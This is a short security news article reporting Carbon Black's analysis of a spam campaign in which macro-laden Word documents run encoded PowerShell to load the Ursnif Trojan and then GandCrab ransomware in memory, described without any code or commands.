Researchers warn about a new wave of attacks with an information-stealing Trojan called Ursnif that uses PowerShell and fileless execution mechanisms, making it harder to detect. Some of the attacks also deploy the GandCrab ransomware.

Ursnif, also known as Dreambot, has been around for some time and initially focused on stealing emails and online banking credentials from browsers. However, the Trojan has modules that extend its functionality and has recently been used to deploy other malware as well.

For example, researchers from Carbon Black have observed a spam campaign over the past month that distributes Ursnif, which in turn installs the GandCrab ransomware. “The overall attack leverages several different approaches, which are popular techniques amongst red teamers, espionage focused adversaries and large scale criminal campaigns,” the Carbon Black researcher said in a new report.

The attack chain starts off with spam emails that carry Word documents containing malicious macro scripts. The macros are obfuscated with junk code but are designed to execute an encoded PowerShell command stored in the Alternate Text field of an object inside the document.

Document macros and PowerShell scripts have been extensively abused to install malware on computers over the past few years because attackers like to live off the land and these features are present by default in Windows and Microsoft Office.

Ursnif’s PowerShell script downloads a payload from a hard-coded command-and-control server and executes it directly in memory. This second payload then downloads another file in raw form from and injects it into the PowerShell process. The final payload is version 5.0.4 of GandCrab, a ransomware program sold on underground markets as a service, where its creators allow other cryber criminals to use it for a cut of the profits. There’s already a decryption tool available for some GandCrab variants, but this appears to be a newer version.

Source link